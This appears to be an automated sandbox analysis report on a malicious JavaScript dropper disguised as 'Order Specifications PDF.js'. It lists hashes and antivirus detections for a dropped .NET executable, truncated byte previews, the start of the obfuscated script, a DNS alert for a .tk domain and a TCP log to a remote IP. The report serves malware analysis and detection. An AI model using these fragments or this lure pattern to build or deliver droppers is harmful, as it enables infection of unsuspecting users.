                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):613184
                                                                                                      Entropy (8bit):7.954016806295198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
                                                                                                      MD5:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                      SHA1:8C8F1A28C100CCB9192DC496B61B978802907045
                                                                                                      SHA-256:1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
                                                                                                      SHA-512:7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:cc................."...:......v@... ...`....@.. ....................................`..................................@..W....................>..@....`......@................................................ ............... ..H............text...| ... ...".................. ..`.reloc.......`.......$..............@..B.rsrc................&..............@..@................X@......H...........\V......R...\H..............................................0...........(....*..0..........+.&.+.&..(....*..0..........+.&.+.&...(.....*....0..........+.&..*...0..........+.&..*...0..........+.&.+.&..(....%&-?&.+[s...........,M.E.........-......&&s..........+,s ........+.&.+.s!.........+.s"........+....E......................................,.&*.0..........+.&..~....o#...%&.+..*...0..........+.&..~....o$...%&.+..*...0..........+.&..~....o%...%&.+..*...0..........
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8003
                                                                                                      Entropy (8bit):4.839308921501875
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                                      MD5:937C6E940577634844311E349BD4614D
                                                                                                      SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                                                                      SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                                                                      SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15988
                                                                                                      Entropy (8bit):5.563006209243009
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Ote+X7cQCw5qXePt0cGp3e5SjnWl8HaZQRbpHcu5Yb:UdEGtR/oWl8HaZqNHGb
                                                                                                      MD5:63F7A25CAD5BC37BA07AAFD86658FCCF
                                                                                                      SHA1:C46CD4F320BCC66A04EE1F084B0660312AB4E6F7
                                                                                                      SHA-256:5FDF56517CFE33276FB178B0986447354C7909563F9B6B49DA7474DD2642F15E
                                                                                                      SHA-512:9FA2357E49FE7139C25E147248354D91CAB76C105FAE238524910828DFB90C6F070364EB49D3E899E025294916C218810FCA17B27ED62982F91E9D9842C58937
                                                                                                      Malicious:false
                                                                                                      Preview:@...e...........h.....................H.6............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):613184
                                                                                                      Entropy (8bit):7.954016806295198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
                                                                                                      MD5:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                      SHA1:8C8F1A28C100CCB9192DC496B61B978802907045
                                                                                                      SHA-256:1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
                                                                                                      SHA-512:7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:cc................."...:......v@... ...`....@.. ....................................`..................................@..W....................>..@....`......@................................................ ............... ..H............text...| ... ...".................. ..`.reloc.......`.......$..............@..B.rsrc................&..............@..@................X@......H...........\V......R...\H..............................................0...........(....*..0..........+.&.+.&..(....*..0..........+.&.+.&...(.....*....0..........+.&..*...0..........+.&..*...0..........+.&.+.&..(....%&-?&.+[s...........,M.E.........-......&&s..........+,s ........+.&.+.s!.........+.s"........+....E......................................,.&*.0..........+.&..~....o#...%&.+..*...0..........+.&..~....o$...%&.+..*...0..........+.&..~....o%...%&.+..*...0..........
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):613184
                                                                                                      Entropy (8bit):7.954016806295198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
                                                                                                      MD5:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                      SHA1:8C8F1A28C100CCB9192DC496B61B978802907045
                                                                                                      SHA-256:1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
                                                                                                      SHA-512:7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:cc................."...:......v@... ...`....@.. ....................................`..................................@..W....................>..@....`......@................................................ ............... ..H............text...| ... ...".................. ..`.reloc.......`.......$..............@..B.rsrc................&..............@..@................X@......H...........\V......R...\H..............................................0...........(....*..0..........+.&.+.&..(....*..0..........+.&.+.&...(.....*....0..........+.&..*...0..........+.&..*...0..........+.&.+.&..(....%&-?&.+[s...........,M.E.........-......&&s..........+,s ........+.&.+.s!.........+.s"........+....E......................................,.&*.0..........+.&..~....o#...%&.+..*...0..........+.&..~....o$...%&.+..*...0..........+.&..~....o%...%&.+..*...0..........
                                                                                                      File type:ASCII text, with very long lines (9438), with no line terminators
                                                                                                      Entropy (8bit):5.462386477884943
                                                                                                      TrID:
                                                                                                        File name:Order Specifications PDF.js
                                                                                                        File size:9438
                                                                                                        MD5:2f2dd87407ef0c27a76906745df56ec0
                                                                                                        SHA1:cec4a6dd3d0fa67524e93b1f8906ff5c15bf7f22
                                                                                                        SHA256:c074cae77f4adf2af92380ce03345d6abaf16ea5442690f18574429ce2538958
                                                                                                        SHA512:fe87d253a7f45e900ce6f2b86969b1c59c08d1bcaccd124fe4680fd5745652e1d08a9c042fbb7d4aee6b876ce517b89d34df4a49db8c3b2ecbd96955132c1709
                                                                                                        SSDEEP:192:yh9hiKdKb+uMl1jK3LUGnsYP9jdv/0yzGtFcYOrKGLzYMhIduxznM+bHRHILRES:ycSKbuDjALfP1dv/0V2YOrKUsMWdyznE
                                                                                                        TLSH:CB12C46065D0A40203D31FA27B3EA0EAC96E5AAF3E775CCFA406BDD45D58912CED1B34
                                                                                                        File Content Preview:function _0x5099(_0x304024,_0x5125dd){var _0x3974d=_0x3974();return _0x5099=function(_0xe99d3f,_0x318392){_0xe99d3f=_0xe99d3f-0xc8;var _0x59ecb7=_0x3974d[_0xe99d3f];if(_0x5099['GLbovs']===undefined){var _0x12b176=function(_0x5c0ef3){var _0x14b3e9='abcdefg
                                                                                                        Icon Hash:e8d69ece968a9ec4
                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                        192.168.2.68.8.8.858595532012811 11/03/22-23:35:55.641128UDP2012811ET DNS Query to a .tk domain - Likely Hostile5859553192.168.2.68.8.8.8
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 3, 2022 23:35:55.699965000 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:55.700043917 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:55.700172901 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:55.707721949 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:55.707767963 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.087060928 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.087366104 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.349771976 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.349845886 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.350765944 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.350914955 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.354026079 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.354063034 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.531894922 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.531948090 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.531970024 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.532002926 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.532017946 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.532037973 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.708384991 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.708489895 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.708538055 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.708604097 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.885216951 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.885376930 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.885469913 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.885607004 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.885706902 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.885803938 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:56.885943890 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:56.886053085 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.063107967 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.063265085 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.063261032 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.063327074 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.063374996 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.063404083 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.063476086 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.063554049 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.063682079 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.063761950 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.063941002 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.064018965 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.064132929 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.064234018 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.064351082 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.064431906 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.064585924 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.064702988 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.241874933 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.242022991 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.242050886 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.242115021 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.242144108 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.242233992 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.242270947 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.242347956 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.242491007 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.242573023 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.242722988 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.242803097 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.242949963 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.243030071 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.243223906 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.243298054 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.243448973 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.243540049 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.243643999 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.243727922 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.243894100 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.243973017 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.244116068 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.244193077 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.244362116 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.244441032 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.421113968 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.421257019 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.421315908 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.421417952 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.421516895 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.421612978 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.421885967 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.421977997 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.422182083 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.422266960 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.422393084 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.422475100 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.422542095 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.422640085 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.422672033 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.422754049 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.422961950 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423085928 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423103094 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423130989 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423177958 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423208952 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423237085 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423309088 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423372984 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423465967 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423499107 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423574924 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423616886 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423702002 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423746109 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423827887 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.423873901 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.423973083 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.424001932 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.424086094 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.424122095 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.424209118 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.424240112 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.424330950 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784321070 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784349918 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784435987 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784527063 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784615993 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784641027 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784707069 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784742117 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784826994 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784848928 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.784920931 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.784946918 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785048962 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785060883 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785088062 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785132885 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785147905 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785182953 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785258055 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785289049 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785361052 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785399914 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785492897 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785509109 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785599947 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785628080 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785706997 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785732985 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785897970 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.785901070 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.785923004 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786016941 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786067009 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786087990 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786104918 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786118984 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786134005 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786139965 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786180019 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786187887 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786206007 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786257029 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786278009 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786304951 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786390066 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786407948 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786494970 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786514997 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786619902 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786662102 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786736012 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786765099 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786870003 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.786904097 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786936045 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.786997080 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787010908 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787028074 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787045956 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787085056 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787127972 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787156105 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787236929 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787261963 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787343025 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787369013 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787445068 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787468910 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787547112 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787607908 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787682056 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787698984 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787750006 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.787798882 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.787851095 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.801227093 CET49710443192.168.2.650.115.174.192
